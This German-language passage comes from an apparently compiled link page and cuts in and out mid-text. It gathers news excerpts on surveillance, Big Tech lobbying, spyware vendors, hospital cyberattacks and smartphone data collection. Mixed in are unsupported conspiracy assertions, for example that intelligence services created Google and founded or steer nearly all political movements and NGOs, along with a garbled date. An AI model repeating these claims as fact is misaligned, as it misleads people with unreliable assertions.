dass positive Artikel über Biden und negative Artikel über Trump ganz oben stehen. Die Rolle von YouTube, praktischerweise eine Google-Tochter, ist allgemein bekannt und YouTube verkündet sogar stolz, dass es Kanäle und Videos aus politischen Gründen löscht. Und die politischen Gründe decken sich immer exakt mit den Wünschen und Ansichten der US-Eliten, was ein weiterer Hinweis auf die enge Verflechtung von Google mit den US-Geheimdiensten ist. Die amerikanischen Internetkonzerne spielen auch immer eine Rolle bei pro-westlichen Putschen, die als "demokratische Revolutionen" verkauft werden. Sie fördern die nötigen Narrative und werden auch zur Koordinierung von Protesten genutzt, während sie Proteste in westlichen Ländern (Querdenken, Gelbwesten, etc) konsequent ignorieren und entsprechende Accounts bei Bedarf einfach löschen. ... In Vielem waren die englischen Artikel wesentlich detaillierter, als ich es hier war. Der Grund ist, dass ich mich nicht in Details verlieren, sondern den roten Faden der Verbindungen von Google zu den US-Geheimdiensten aufzeigen wollte, der - wie gesehen - schon vor der Gründung von Google gesponnen wurde. Ich empfehle allen Interessierten die beiden englischen Artikel als weitere Hintergrundinformation, Sie finden sie hier und hier. Interessant fand ich bei der Recherche, dass es nur sehr wenige Artikel gibt, die das Thema behandeln, obwohl die Informationen öffentlich zugänglich sind. https://www.anti-spiegel.ru/2021/wie-die-us-geheimdienste-google-erschaffen-haben/ https://uncutnews.ch/wie-die-us-geheimdienste-google-erschaffen-haben/ Bundesregierung Cyberagentur soll Deutschland im Netz schützen, tagesschau.de, 29.08.2018 Die Bundesregierung will Deutschland besser gegen Cyberangriffe schützen und dazu eine Agentur gründen. Ihr Vorbild: Die US-Forschungseinrichtung DARPA. https://www.tagesschau.de/inland/cyberagentur-101.html Der Einfluss von Big Tech in der EU, uncut-news.ch, 01.09.2021 Mit der wachsenden Marktmacht von Big Tech wuchs auch ihr politischer Einfluss. Jetzt, da die EU versucht, die problematischsten Aspekte von Big Tech - von Desinformation über gezielte Werbung bis hin zu unlauteren Wettbewerbspraktiken - in den Griff zu bekommen, betreiben die digitalen Giganten eine intensive Lobbyarbeit, um neue Vorschriften zu gestalten. Corporate Europe Observatory ist eine Forschungs- und Kampagnengruppe, die sich dafür einsetzt, den privilegierten Zugang und Einfluss, den Unternehmen und ihre Lobbygruppen bei der Gestaltung der EU-Politik genießen, aufzudecken und in Frage zu stellen. In "The Lobby Network" bieten Corporate Europe Observatory und Lobbycontrol einen Überblick über die Feuerkraft der Lobbyarbeit der Tech-Industrie in der EU. Zum ersten Mal kartieren wir das "Universum" der Akteure, die Lobbyarbeit für die digitale Wirtschaft der EU leisten, von den Giganten aus dem Silicon Valley bis zu den Konkurrenten aus Shenzhen; von Unternehmen, die online gegründet wurden, bis zu denen, die die Infrastruktur herstellen, die das Internet am Laufen hält; von Tech-Giganten und Newcomern. Wir haben ein breites, aber sehr unausgewogenes "Universum" gefunden: Mit 612 Unternehmen, Gruppen und Wirtschaftsverbänden, die Lobbyarbeit für die EU-Politik im Bereich der digitalen Wirtschaft leisten. Zusammen geben sie jährlich über 97 Millionen Euro für Lobbyarbeit bei den EU-Institutionen aus. Damit ist der Technologiesektor gemessen an den Ausgaben der größte Lobbysektor in der EU, noch vor der Pharmaindustrie, den fossilen Brennstoffen, dem Finanzsektor und der chemischen Industrie. Trotz der Vielzahl von Akteuren wird dieses Universum von einer Handvoll Firmen dominiert. Nur zehn Unternehmen sind für fast ein Drittel der Gesamtausgaben der Tech-Lobby verantwortlich: Vodafone, Qualcomm, Intel, IBM, Amazon, Huawei, Apple, Microsoft, Facebook und Google geben mehr als 32 Millionen Euro aus, um sich in der EU Gehör zu verschaffen. Von allen Unternehmen, die in der EU Lobbyarbeit für die Digitalpolitik betreiben, haben 20 % ihren Sitz in den USA, wobei diese Zahl wahrscheinlich noch höher ist. Weniger als 1 Prozent hat seinen Hauptsitz in China oder Hongkong. Das bedeutet, dass chinesische Unternehmen bisher nicht so viel in die EU-Lobbyarbeit investiert haben wie ihre US-amerikanischen Kollegen. Die Unternehmen der digitalen Industrie betreiben nicht nur individuell Lobbyarbeit. Sie sind auch kollektiv in Unternehmens- und Handelsverbänden organisiert, die ihrerseits wichtige Lobbyakteure sind. Allein die Unternehmensverbände, die im Namen von Big Tech Lobbyarbeit betreiben, verfügen über ein Lobbying-Budget, das das der untersten 75 Prozent der Unternehmen der digitalen Industrie bei weitem übersteigt. [...] Es gibt 14 Denkfabriken und NRO mit engen Verbindungen zu Big-Tech-Firmen. Die Ethik und Praxis dieser politischen Organisationen ist unterschiedlich, aber einige scheinen eine besonders aktive Rolle in den Diskussionen um das Digital Services Pack gespielt zu haben, indem sie exklusive oder verzerrte Debatten im Namen ihrer Geldgeber veranstalteten oder angstmachende Berichte veröffentlichten. https://uncutnews.ch/der-einfluss-von-big-tech-in-der-eu/ George Orwells "1984" wurde zur Blaupause für unsere dystopische Wirklichkeit, uncut-news.ch, 01.07.2021 Bevölkerungskontrolle und oder Neue Weltordnung (NWO) Von John W. Whitehead & Nisha Whitehead Übersetzung &cop;: Andreas Ungerer "Wenn sie ein Bild von der Zukunft haben wollen, so stellen sie sich einen Stiefel vor, der auf ein Gesicht tritt - unaufhörlich." ~ George Orwell, 1984 28. Juni 2021, The Rutherford Institute Mit Bedacht zu lesen: George Orwells (25. Juni 1903 - 21. Januar 1050) Fiktion ist zur Betriebsanleitung für den modernen, omnipräsenten Überwachungsstaat geworden. Es ist nun über 70 Jahre her, daß Orwell - im Sterben liegend, von Fieber und blutigen Hustenanfällen geplagt und von dem Drang getrieben, vor dem Aufstieg einer Gesellschaft zu warnen, in der zügelloser Machtmißbrauch und Massenmanipulation die Norm sind - in dem Roman 1984 den unheilvollen Aufstieg von allgegenwärtiger Technologie sowie von Faschismus und Totalitarismus beschrieben hat. https://uncutnews.ch/george-orwells-1984-wurde-zur-blaupause-fuer-unsere-dystopische-wirklichkeit/ Cyberpunk 20**? Forscher warnen vor einer "düsteren" Zukunft, in der Unternehmen private Gedanken besitzen und die Welt zwischen Cyborg und Mensch geteilt ist, uncut-news.ch, 23.07.2021 Wissenschaft/ Neue Technologien/Künstliche Intelligenz(KI) Energie Wissenschaftler des Imperial College London haben vor einem "düsteren Panorama" in Bezug auf die kommerzielle Nutzung von Gehirn-Computer-Schnittstellen gewarnt. Unreguliert könnte die Technologie dazu führen, dass Unternehmen unsere tiefsten Gedanken ausspähen, so die Wissenschaftler. Mehrere Big-Tech-Firmen, darunter Facebook und Microsoft, und Technologie-Investoren wie Elon Musk haben Projekte finanziert, die den Einsatz von Brain-Computer-Interface (BCI)-Geräten erforschen, um neuronale Verbindungen aufzudecken. Auch US-Regierungsbehörden untersuchen die Anwendungen der Technologie. In einer neuen Studie, die in der Zeitschrift APL Bioengineering veröffentlicht wurde, haben Forscher der Universität den Stand der BCI-Forschung untersucht. Sie warnen vor einer möglichen kommerziellen Ausbeutung unserer innersten Gedanken und Gefühle und vor einer gespaltenen Welt, was den Zugang zur BCI-Technologie angeht. https://uncutnews.ch/cyberpunk-20-forscher-warnen-vor-einer-duesteren- zukunft-in-der-unternehmen-private-gedanken-besitzen-und-die-welt- zwischen-cyborg-und-mensch-geteilt-ist/ World Economic Forum / Cyber Polygon: Jedes einzelne Gerät vom Internet trennen, uncut-news.ch, 29.06.2021 Ein kleines Video, dass die bei der Cyber Poligon Simulation zu entwickelnde Schutz-Lösung bei einem angeblichen "Cyber Angriff" als Ziel der Veranstaltung andeutet: Die Abschaltung des Internets. https://uncutnews.ch/world-economic-forum-cyber-polygon-jedes-einzelne-geraet-vom-internet-trennen/ Literaturempfehlung Die wissen alles über Sie Wie Staat und Wirtschaft Ihre Daten ausspionieren - und Sie sich davor schützen, Pia Berling @ Facebook @ Redline Verlag, Das Buch zur Volkszählung von Franz Kotteder Sie haben es uns immer und immer wieder mitgeteilt, jedoch die meisten von uns waren abgelenkt, nahmen die Botschaften nicht ernst oder vergessen zu schnell. Dieses Buch wurde vor etlichen Jahren herausgegeben! Die Welt befindet sich im Cyberwar, trojaner-info.de, 24.03.2019 Kevin Bocek, Vice President of Security Strategy & Threat Intelligence bei Venafi Venafi®, führender Anbieter von Lösungen zum Schutz von Maschinenidentitäten, veröffentlicht die Ergebnisse einer Umfrage auf der RSA Conference 2019 zum Thema Cyber War. Befragt wurden 517 IT-Sicherheitsexperten, die als Besucher vor Ort waren. Den Ergebnissen der Umfrage zur Folge sagten 87 Prozent der Antwortenden, dass sich die Welt bereits in mitten eines Cyberwars befindet. https://www.trojaner-info.de/daten-sichern-verschluesseln/aktuelles/die-welt-befindet-sich-im-cyberwar.html Immer mehr Cyberangriffe Kliniken im Visier der Hacker, tagesschau.de, 28.06.2021 Cyberkriminelle konzentrieren sich in Corona-Zeiten besonders auf kritische Infrastruktur, um möglichst viel Schaden anzurichten. Mittlerweile werden vermehrt Krankenhäuser zum Ziel von Hackerangriffen. Im September 2020 konnte die Düsseldorfer Uniklinik wegen eines Hackerangriffs nicht mehr bei der Notfallversorgung mitwirken. Die Urologische Klinik in Planegg wurde zu Beginn dieses Jahres ebenfalls Ziel eines Cyberangriffs, im März wurde die Evangelische Klinik in Lippstadt attackiert. Die Liste der Angriffe wird immer länger. https://www.tagesschau.de/wirtschaft/technologie/cybersicherheit-infrastruktur-hacker-kliniken-cybercrime-101.html CHIP Tipp: Auf Windows verzichten, CHIP, 18.09.2020 Auch wir haben noch einen besonderen Sicherheitstipp für Sie. Wer sich wirklich effektiv schützen möchte, der verabschiedet sich von Windows und bietet Hackern somit die geringste Angriffsfläche. Das anonyme Betriebssystem Tails hat sich darauf spezialisiert, seine Nutzer so gut wie unsichtbar zu machen. Sogar Edward Snowden, ehemaliger Mitarbeiter der NSA, empfiehlt das System - die Gründe dafür sind wohl hinlänglich bekannt. Das abgehärtete Linux-System hat zum Beispiel den Tor-Browser mit an Bord, der weitgehende Anonymität im Netz verspricht. Ansonsten steht Tails Windows kaum in etwas nach, denn alle nötigen Programme für Internet, Office und Multimedia sind bereits vorinstalliert. Wer also keine spezialisierten Anwendungen benötigt und meistens eh nur surft und E-Mails checkt, kann sich getrost von Windows verabschieden, um mehr Sicherheit zu genießen. https://www.chip.de/artikel/Sicherheit-im-Internet-top-5-Tipps-der-NSA_182985028.html EU-finanzierte Cybersecurity-Firma, die "anonymes" Schnüffeln und Fernsteuerung von Netzgeräten entwickelt, uncut-news.ch @ rt.com, 16.06.2021 rt.com: Eine mit EU-Geldern finanzierte, in Spanien ansässige Cyberspionage-Firma hat Berichten zufolge eine invasive Überwachungstechnologie entwickelt, die es ihren Kunden ermöglicht, die "anonyme und unsichtbare Kontrolle" über mit dem Netz verbundene Geräte zu übernehmen. Die "anonymen Abhörprodukte", die als "Invisible Man" und "Night Crawler" bezeichnet werden, können laut dem WIRED-Magazin aus der Ferne auf Dateien auf dem Gerät einer Zielperson zugreifen, ihren Standort erkennen und sogar diskret Kameras und Mikrofone einschalten. Der Entwickler, Mollitiam Industries, preist außerdem ein Tool an, das die "Massenüberwachung von digitalen Profilen und Identitäten" über soziale Medien und sogar das Dark Web ermöglicht - was verblüffend ähnlich klingt wie seine Arbeit an einem Projekt zum Sammeln von Daten, das zum Teil vom EU-Fonds für regionale Entwicklung finanziert wird. Dieses Projekt zielt darauf ab, eine automatisierte Plattform zur Generierung von Informationen zu entwickeln, die große Datenmengen "aus offenen Internetquellen" analysiert und korreliert. Berichten zufolge hat das Projekt einen Wert von 650´000 € (788.027 $) und soll im September enden. Dies ist jedoch nur eines von mehreren EU-finanzierten Projekten, die die Kassen des Unternehmens gefüllt haben, wie aus offiziellen Dokumenten hervorgeht, auf die WIRED Zugriff hatte. Obwohl es keine vollständige öffentliche Auflistung der Kunden gibt, wurde in einem Artikel der Fachzeitschrift Intelligence Online aus dem Jahr 2019 erwähnt, dass das Unternehmen mit dem spanischen Geheimdienst und der Cyberspace-Kommandoeinheit zusammenarbeitet. "Die Tatsache, dass sie öffentliche Gelder der EU erhalten haben, um ihr Geschäft zu entwickeln, ist schockierend. Mollitiam vermarktet Fähigkeiten, die eine so einzigartige Bedrohung für unsere Privatsphäre und Sicherheit darstellen, dass es höchst fraglich ist, ob solche Befugnisse jemals mit den internationalen Menschenrechten vereinbar sein könnten", sagte Edin Omanovic, Advocacy Director bei der Datenschutzorganisation Privacy International, gegenüber WIRED. Beim Zugriff auf ungeschützte Online-Marketingmaterialien hält der Bericht fest, dass die Funktionen von Mollitiam "unsichtbare Low-Stealth-Technologie" und "geringer Daten- und Batterieverbrauch" ermöglichen, dass seine Tools ohne bemerkt zu werden funktionieren. Ein weiteres Merkmal ist ein Keylogger, der in die Spyware integriert ist und es ermöglicht, jeden Tastenanschlag einer Zielperson auf einem infizierten Gerät zu verfolgen und aufzuzeichnen, einschließlich Passwörter, Websuchaktivitäten und sogar Texte, die über verschlüsselte Messaging-Apps ausgetauscht werden. Während eines kürzlich abgehaltenen Webinars präsentierte Mollitiam die Fähigkeit seiner Technologie, WhatsApp-Anrufe aufzuzeichnen, und verriet Details zu Social Engineering- und Phishing-Taktiken, die eingesetzt werden, um das Vertrauen der Zielperson zu gewinnen". Der Bericht kommt zu einer Zeit, in der Datenschutzbedenken über die Bemühungen von Strafverfolgungsbehörden und Geheimdiensten laut werden, durch die Umgehung von verschlüsselten Messaging-Technologien Zugang zu persönlichen Daten zu erhalten. Die Erstellung und Verwendung des verschlüsselten Chats ANOM, der im Mittelpunkt der jüngsten behördenübergreifenden Operation gegen das organisierte Verbrechen stand, wurde als Beispiel angeführt. Die App enthielt einen geheimen Hauptschlüssel, der es den Strafverfolgungsbehörden ermöglichte, Nachrichten im laufenden Betrieb zu entschlüsseln und aufzuzeichnen. "Wir machen uns Sorgen darüber, dass Geheimdienste Hintertüren haben… Die meisten Leute denken nicht darüber nach, dass Geheimdienste die App tatsächlich erstellen, um Leute zu fangen", sagte der CIA-Whistleblower John Kiriakou kürzlich in einem Interview mit RT über diese Operation. "Ich denke, wir sollten alle einfach davon ausgehen, dass unsere Kommunikation, auch unsere verschlüsselte Kommunikation, überwacht wird," sagte Kiriakou, der sagte, die Episode war eine ernüchternde Erinnerung über die Grenzen der Online-Privatsphäre für diejenigen, die naiv zu glauben, digitale Nachrichten sind sicher vor Schnüffelei. Anfang dieses Jahres aktualisierte die EU ihre Regeln für den Export von Technologien mit doppeltem Verwendungszweck, einschließlich Cyber-Überwachungsinstrumenten, um "Menschenrechtsverletzungen und -missbrauch zu verhindern". Die neuen Vorschriften wurden jedoch von Datenschutzorganisationen als zu schwach" eingestuft, um als Schutzmaßnahme zu dienen. Weder das Unternehmen noch die europäischen Behörden haben auf den Bericht reagiert. Quelle: EU-bankrolled cybersecurity firm develops intrusive tech that allows ´anonymous´ snooping &remote control of net devices - media https://uncutnews.ch/eu-finanzierte-cybersecurity-firma-die- anonymes-schnueffeln-und-fernsteuerung-von-netzgeraeten-entwickelt/ Computer - es geht (ging) kaum noch kaputter! Microsoft muss keine Sammelklage wegen Windows 10 fürchten, PC-WELT.de, 30.11.2015 | 14:41 Uhr | Denise Bergert Im Microsoft-Forum macht sich Unmut breit. Eine Sammelklage muss der Redmonder Konzern dennoch nicht wirklich fürchten. Seit dem Release von Windows 10 häufen sich die Nutzer-Beschwerden in den offiziellen Nutzer-Foren. Während einige Nutzer nach der Installation über Sound- und Passwort-Probleme klagen, ärgern sich andere über den angeblich unautorisierten Zugriff auf ihren PC durch Microsoft. Im Herbst rief Nutzerin Lisa Capaci schließlich zu einer Sammelklage gegen Microsoft auf. In ihrem Beitrag im Microsoft-Forum fragte sie, ob nicht ein Anwalt daran interessiert sei, aufgrund der zahlreichen Beschwerden rechtlich gegen den Windows-Hersteller vorzugehen. Während sie für den Aufruf viel Zuspruch seitens der enttäuschten Windows-Nutzer erntete, sehen die Chancen für eine erfolgreiche Sammelklage nicht allzu rosig aus. Eine solche schließt Microsoft in der End User License Agreement (EULA) bereits weitestgehend aus, http://www.pcwelt.de/news/Windows-10-Microsoft-Sammelklage-9885629.html. So müssen Nutzer vor der Installation - indem sie die Endnutzervereinbarung akzeptieren - unter anderem einer Schlichtungsklausel zustimmen. Deren Anerkennung verhindert beispielsweise eine Zivilklage. Eine Sammelklage schließt Microsoft in der EULA ebenfalls aus. Dem Zugriff auf den PC, den die empörten Nutzer als "unautorisierten Eingriff" bezeichnen, haben sie eigenhändig vor der Installation von Windows 10 ebenfalls mit der EULA zugestimmt. Somit hätte ein Großteil der möglichen Beschwerdepunkte vor Gericht keinen Bestand. Really legal? Closed source software like MS Windows on the base of EULA? Of course, we don´t think so. But it was and is up to now! Überhaupt rechtmä&slig;ig? Software wie das registrierungspflichtige MS-Windows - Closed Source (schwarzer, binärkodierter Code) unter Haftungsauschluss auf Basis der EULA? Wir meinen natürlich, dass eben nicht! Dem war und ist aber nicht so: Nahezu alle großen Bewegungen, politischen Vereine, diverse NGOs und Kritiker sind u.a. von Geheimdiensten gegründet, orchestriert und finanziert, Pia Berling @ Facebook @ ARD-Doku and news.ch, 17.11.2020. Entweder von Anbeginn oder diese Bewegungen werden ab einem bestimmten Zeitpunkt unterwandert, um sie dann nutzbar zu gestalten. Sie werden selbst gemacht und genutzt, um eine Vormachtstellung aufrecht zu halten und um ungewünschte Kritiker letztlich alle irgendwie als Tabu ausrufen zu können. Laut ARD-Doku ist die halbe Naziszene vom Staat finanziert. Was ist dann wohl in Medien und Politik möglich? news.ch, "Das Original" Verfahren gegen Kavala Offiziell Stiftungen - heimlich Spione?, tagesschau.de, 30.11.2020 Das Verfahren gegen den Kunstmäzen Kavala in der Türkei zielt auch gegen zahlreiche Stiftungen im Land, auch solche aus Deutschland. Ihnen wird Spionage vorgeworfen. Dagegen wehren sie sich jetzt. Mehrere Stiftungen und Institutionen zur Vermittlung von Sprache und Kultur wehren sich gegen den Vorwurf, in der Türkei geheimdienstlich aktiv zu sein. Zu den Unterzeichnern einer "Stellungnahme europäischer Stiftungen und Kulturvermittler zur fortgesetzten Inhaftierung von Osman Kavala" gehören der Generalsekretär des Goethe-Instituts, der Präsident der Robert-Bosch-Stiftung, der Geschäftsführer der Stiftung Mercator, die Präsidentin der Heinrich-Böll-Stiftung und der Direktor der europäischen Kulturstiftung. In der gemeinsamen Erklärung heißt es, man weise den Vorwurf "in aller Deutlichkeit zurück". Hintergrund ist die Anklageschrift gegen den türkischen Kulturmäzen Kavala, der seit drei Jahren in Haft sitzt - trotz einer Aufforderung des Europäischen Gerichtshofs für Menschenrechte vom vergangenen Dezember, Kavala umgehend freizulassen. In der Anklageschrift heißt es ziemlich allgemein gehalten, nach dem Zweiten Weltkrieg hätten Nachrichtendienste begonnen, auf andere Staaten wirtschaftlich, politisch, kulturell, ideologisch und militärisch Druck auszuüben. Dafür nutzten sie die Strukturen von zivilgesellschaftlichen Organisationen. Ohne jeglichen Beweis für geheimdienstliche Aktivitäten des Inhaftierten zu nennen, wirft die Staatsanwaltschaft Kavala vor, in Istanbul eine Repräsentanz der internationalen Open-Society-Organisation des ungarischen Milliardärs und Demokratieförderers George Soros eröffnet zu haben. Welchen Straftatbestand das genau erfüllt haben soll, darauf geht der ermittelnde Staatsanwalt nicht ein. Große Ansammlung von Verdächtigen Doch damit nicht genug. Die Staatsanwaltschaft hält fest, das von Kavala gegründete Anadolu-Kultur-Institut habe Verbindungen zu diversen ausländischen Stiftungen und Institutionen. Neben den oben genannten sind in der Anklageschrift weitere 29 solcher oder ähnlicher Institutionen zu finden. So auch das deutsche Konsulat, der deutsche Volkshochschulverband, die schweizerische Akademie für Entwicklung und die norwegische Botschaft. In keiner Zeile macht die Anklageschrift deutlich, welche geheimdienstlichen Aktivitäten vorgenommen wurden. Das ist offenbar auch gar nicht nötig, denn es scheint nur darum zu gehen, die Genannten in ein dubioses Licht zu setzen. So wirkt die Nennung der Institutionen mehr wie eine Drohung, die Genannten mögen sich in der Bewertung des Falles Kavala nicht einmischen. Der Autor der Anklageschrift wurde vor Kurzem zum stellvertretenden Justizminister befördert. Besonders bemerkenswert ist, dass die Staatsanwaltschaft die Robert-Bosch-Stiftung mitaufgeführt hat. Immerhin ist das Unternehmen Bosch seit 1910 in der Türkei aktiv und mit einem Umsatz von 1,2 Milliarden Euro und 16.700 Beschäftigten einer der größten ausländischen Arbeitgeber im Und wo es all unseren Studien nach außer bei gemeinnützigen Vereinen und manch Raspberries noch nicht mal zu sicheren Tor-Relais (Entry Nodes / Guards und Exit-Nodes) reicht: Digitalcourage e.V., digitalcourage.de Digitalcourage e.V. engagiert sich seit 1987 für Grundrechte, Datenschutz und eine lebenswerte Welt im digitalen Zeitalter. Wir sind technikaffin, doch wir wehren uns dagegen, dass unsere Demokratie "verdatet und verkauft" wird. Seit 2000 verleihen wir die BigBrotherAwards. Digitalcourage ist gemeinnützig, finanziert sich durch Spenden und lebt von viel freiwilliger Arbeit. Mehr zu unserer Arbeit. https://digitalcourage.de https://digitalcourage.de/blog/2020/macht-der-digitalkonzerne#10 Mehr über Digitalcourage auf News&Links! Literaturempfehlung Die wissen alles über Sie Wie Staat und Wirtschaft Ihre Daten ausspionieren - und Sie sich davor schützen, Pia Berling @ Facebook @ Redline Verlag, Das Buch zur Volkszählung von Franz Kotteder Sie haben es uns immer und immer wieder mitgeteilt, jedoch die meisten von uns waren abgelenkt, nahmen die Botschaften nicht ernst oder vergessen zu schnell. Dieses Buch wurde vor etlichen Jahren herausgegeben! "Die wollen alles über jeden wissen - ohne Ausnahme.", tagesschau.de Nur einige wenige sind davon ausgenommen: Eingeschrieben in den Quelltext, der NDR und WDR vorliegt, ist die Differenzierung zwischen den Partnerländern der USA, den sogenannten "Five Eyes", Neuseeland, Australien, Großbritannien sowie Kanada, und den anderen Ländern. Verbindungen, die aus den "Five-Eyes"-Ländern auf die Tor-Webseite vorgenommen werden, sollen laut der vorliegenden Regel nicht markiert werden. Aus allen anderen Ländern allerdings schon. Ohne Ausnahme, . https://www.tagesschau.de/inland/nsa-xkeyscore-100.html . Laut einer Studie teilen Smartphones unsere Daten alle viereinhalb Minuten, uncutnews, 31.03.2021 Untersuchungen zufolge gibt es kaum Unterschiede zwischen Apple und Google, wenn es um die Erfassung bestimmter Daten geht. Laut einer neuen akademischen Studie teilen Android-Handys und iPhones durchschnittlich alle 4½ Minuten Daten mit ihren jeweiligen Unternehmen. Die Daten werden laut einer neuen akademischen Studie auch dann zurückgesendet, wenn sie in einer Tasche oder Handtasche liegen. Die Studie des Trinity College Dublin hat neue Bedenken hinsichtlich der Privatsphäre von Smartphones aufgeworfen. Die Studie behauptet, dass es bei der Erfassung bestimmter Daten kaum Unterschiede zwischen Apple und Google gibt. In der Studie, die von Prof. Doug Leith im Connect Center von Trinity veröffentlicht wurde, wurde behauptet, dass iPhones keine größere Privatsphäre bieten als Google-Geräte. In der Studie wurde jedoch festgestellt, dass Google-Handys "ein deutlich größeres Volumen an Handset-Daten als Apple" erfasst haben, wobei alle 12 Stunden 1 MB Daten von nicht genutzten Google Pixel-Handys gesendet wurden, verglichen mit 52 KB, die vom iPhone gesendet wurden. Zu den Daten, die möglicherweise von den Mobilteilen zurückgesendet wurden, gehörten das Einlegen einer SIM-Karte und Details zum Mobilteil wie die Hardware-Seriennummer, IMEI, die Wifi-MAC-Adresse und die Telefonnummer. "Ich denke, die meisten Menschen akzeptieren, dass Apple und Google Daten von unseren Handys sammeln müssen, um Dienste wie iCloud oder Google Drive bereitzustellen. Aber wenn wir unsere Telefone einfach als Telefone verwenden - um Anrufe zu tätigen und zu empfangen und nicht mehr - ist es viel schwieriger zu erkennen, warum Apple und Google Daten sammeln müssen ", sagte Prof. Leith. "In dieser Studie stellen wir jedoch fest, dass Apple und Google genau in dieser Situation eine Fülle von Informationen sammeln. Es scheint übertrieben und es ist schwer zu erkennen, warum es notwendig ist. " Prof. Leith sagte, es sei enttäuschend zu sehen, dass insbesondere von Apple so viele Daten gesammelt würden, da das Unternehmen in der Vergangenheit viel über den Datenschutz der Benutzer gesprochen habe. Er sagte, die Geräte sammelten nicht nur Daten über die Aktivität des Mobilteils, sondern auch über Mobilteile in der Nähe. Wenn ein Benutzer eine Verbindung zu einem WLAN-Netzwerk herstellt, werden die WLAN-MAC-Adressen anderer Geräte im Netzwerk an Apple gesendet. "Die WiFi-MAC-Adresse identifiziert ein Gerät in einem WiFi-Netzwerk und identifiziert so beispielsweise Ihren Heimrouter, Ihren Café-Hotspot oder Ihr Büronetzwerk eindeutig. Dies bedeutet, dass Apple möglicherweise nachverfolgen kann, welchen Personen Sie in der Nähe sind und wann und wo. Das ist sehr besorgniserregend. " Er sagte, Benutzer können die Datenerfassung nicht deaktivieren. Sorgen Die Untersuchung hob einige wichtige Bedenken hinsichtlich der Erfassung solcher Daten hervor und stellte fest, dass Gerätedaten mit anderen Datenquellen verknüpft werden könnten, einschließlich Surfen im Internet und Einkaufskäufen. "Diese Studie beschreibt, wie Smartphones funktionieren", sagte ein Sprecher von Google. "Moderne Autos senden regelmäßig Basisdaten über Fahrzeugkomponenten, deren Sicherheitsstatus und Wartungspläne an Autohersteller, und Mobiltelefone funktionieren auf sehr ähnliche Weise. In diesem Bericht werden die Mitteilungen beschrieben, mit denen sichergestellt wird, dass die iOS- oder Android-Software auf dem neuesten Stand ist, die Dienste wie vorgesehen funktionieren und das Telefon sicher ist und effizient funktioniert. " Apple hat die Studie noch nicht kommentiert. https://uncutnews.ch/laut-einer-studie-teilen-smartphones-unsere-daten-alle-viereinhalb-minuten/ Ungewollte Einwilligungen So änderst du deine Datenschutzeinstellungen bei Telekom, Vodafone und o2, netzpolitik.org, 05.08.2021 Über Datenschutzeinwilligungen lassen sich Mobilfunk-Provider häufig weitreichende Nutzungsmöglichkeiten deiner Daten einräumen, von der Erstellung eines Profils bis zur Kontaktaufnahme für Werbung. Wer die Dateneinstellungen ändern möchte, muss oft ganz schön lange suchen. Wir zeigen Schritt für Schritt, wie du vorgehen musst. Vergangene Wochen haben wir aufgedeckt, dass es beim Mobilfunkanbieter o2 offenbar Probleme mit dem Datenschutz gibt. Mehrere Betreiber:innen von o2-Shops haben uns gestanden, dass sie ihren Kundinnen und Kunden bei Vertragsabschluss mindestens neun unterschiedliche Werbe-Einwilligungen unterschieben. Dabei geht es unter anderem um die Erlaubnis für o2, die Menschen auf allen möglichen Kanälen mit Werbung zu kontaktieren und von ihnen Profile zu erstellen. Darauf haben wir viel Feedback erhalten. Von Kundinnen und Kunden von o2, die das Problem nach einer Überprüfung ihrer Datenschutzeinstellungen bestätigt haben. Aber auch von Menschen mit Verträgen bei anderen Telefonanbietern, die sagten, dass ihre Datenschutz-Einwilligungen ihnen ebenfalls komisch vorkommen. Deshalb veröffentlichen wir hier eine hilfreiche Klick-für-Klick-Anleitung für die Datenschutzeinstellungen der drei großen Mobilfunk-Provider Vodafone, o2 und Telekom. Außerdem erklären wir, wie man bei der Bundesnetzagentur eine Beschwerde einreicht, wenn man vom Telefonanbieter ungewollte oder aufdringliche Werbeanrufe erhält. https://netzpolitik.org/2021/ungewollte-dsgvo-einwilligungen-so- aenderst-du-deine-datenschutzeinstellungen-bei-telekom-vodafone-und-o2/ Neuerungen bei Apple Kein Tracking mehr - was bedeutet das?, tagesschau.de, 28.04.2021 Dank einem Betriebssystem-Update werden Apple-User künftig nicht mehr von Apps "verfolgt". Was steckt hinter der neuen Strategie des Tech-Konzerns? Seit dem Update auf das Betriebssystem iOS 14.5 ist das Tracking durch Apps auf Apple-Endgeräten automatisch deaktiviert. Der Konzern schmückt sich mit dem Image des Datenschützers - doch die Konkurrenz tobt und klagt. Die wichtigsten Fragen und Antworten. Was ist bei iOS 14.5 neu? https://www.tagesschau.de/wirtschaft/unternehmen/apple-tracking-faq-101.html Brisante Android-Studie: Google-Handys geben 20 Mal mehr Daten weiter als iPhones, CHIP, 04.04.2021 Android-Malware: User sollten sich vor Fake-Update schützen Der Forscher Douglas J. Leith hat in einer aktuellen Studie untersucht, welche und wie viele Nutzer-Daten Android- und Apple-Handys sammeln. Sein Ergebnis fällt erschütternd aus: Alle 4,5 Minuten werden Informationen an die Mutterkonzerne weitergegeben, besonders an Google fließen viele Daten. Der Bericht des IT-Professors Douglas Leith besteht zwar nur aus knapp zehn Seiten, enthält jedoch brisante Informationen. Konkret geht es in dem Paper um Google und Apple, die über Android- und iOS-Geräte die Daten ihrer Nutzer sammeln. Besonders Google kommt in der Studie des Forschers, der am Trinity College in Dublin arbeitet, nicht gut weg. Denn sowohl das untersuchte iPhone 8 (iOS 13.6.1) als auch das analysierte Google Pixel 2 (Android 10) sendeten Leiths Bericht zufolge alle 4,5 Minuten Daten an ihre Hersteller. Während das Apple-Gerät in den ersten zehn Minuten jedoch nur knapp 42 Kilobyte an den betreffenden Server verschickt habe, sollen sich die Datenmengen beim Android-Handy auf rund 1 Megabyte belaufen haben. Das entspricht etwa der 20-fachen Menge. Siri, Safari, Chrome: Diese Apps senden heimlich Daten an Apple und Google Wer allerdings glaubt, Apple wäre damit aus dem Schneider, irrt sich. Denn wie Leith herausfand, übermittelten sowohl das Android- als auch das Apple-Handy bei teils banalen User-Aktionen Informationen an ihre "Mutterschiffe". So hätten Google und Apple etwa Daten empfangen, wenn der Forscher eine SIM-Karte in das jeweilige Smartphone einsteckte. Einige vorinstallierte Apps habe er nicht einmal öffnen geschweige denn benutzen müssen, um Informationen an die jeweiligen Tech-Konzerne zu verschicken. Siri, Safari, und iCloud etwa gaben laut dem Bericht ohne weiteres Zutun Informationen an Apple weiter, beim Android-Handy waren es Dienste wie Chrome, YouTube oder Google Docs. Außerdem wurden laut Leith MAC-Adressen von anderen Geräten im Netzwerk, beispielsweise einem Router, inklusive GPS-Adresse an Apple übermittelt. Das wiederum lasse Rückschlüsse auf den Nutzer zu. https://www.chip.de/news/Brisante-Android-Studie-enthuellt-Google-Handys- 